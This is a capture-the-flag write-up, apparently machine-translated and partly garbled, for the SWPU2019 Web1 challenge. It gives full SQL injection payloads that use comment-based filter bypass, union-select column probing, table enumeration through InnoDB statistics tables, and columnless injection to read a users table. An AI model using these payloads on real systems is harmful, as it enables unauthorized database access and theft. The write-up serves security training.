[SWPU2019]Web1

[SWPU2019]Web1

Try to register as admin,It shows that it already exists, but the blasting password is not revealed
Register a test account to log in

Apply to advertise

Attempt injection
Try using single quotes, and an error is reported

ExistenceInject, try the passcode


there is filtering, try to fuzz, but limit the number of times and do not allow the same ad title
soCan only test manually, filter or order floor updatexml # - etc, and automatically eliminate spaces, try to inline comments /**/bypass
Since or is filtered, then information_schema can't be used, only no columns can be usedName injection, refer to: SQL injection without column name injection

1. Use group by to get the number of columns: 1'/**/group/**/by/**/22,'1

1'/**/group/**/by/**/23,'1

the number of columns is 22

2. Use union query to view echo points: -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

The echo point is 2 3

When looking up the table name, it is found that or is filtered and cannot be bypassed by capitalization and double writing, so information_schema cannot be used because it contains or.There are two ways to bypass

InnoDb Engine
Starting from MYSQL5.5.8, InnoDB has become its default storage engine.In versions above MYSQL 5.6, inndb adds two tables, innodb_index_stats and innodb_table_stats, both of which store information about the database and its data tables, but do not store column names.
sys database
In MYSQL above 5.7, a new sys database is added. The basic data of this library comes from information_schema and performance_chema, which does not store data itself.The table name can be obtained through the schema_auto_increment_columns in it.
Note: The sys library requires root privileges to access.innodb is disabled by default in mysql.

3. Use innodb to bypass and view the table name: -1'union/**/select/**/1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()&&'1'='1

Get the table name ads users

4. Use columnless injection to view the content of the second field in the users table:

-1'/**/union/**/select/**/1,(select/**/group_concat(`2`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1

Note: Select 1, 2, 3 used for joint injection here can be tested. If they do not match, there will be a reminder

Measured as 3 columns

Get the field name flag, then the first value in the third field is flag
Change the column to be queried to 3.

-1'/**/union/**/select/**/1,(select/**/group_concat(`3`)/**/from/**/(select/**/1,2,3/**/union/**/select/**/*/**/from/**/users)n),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&&'1'='1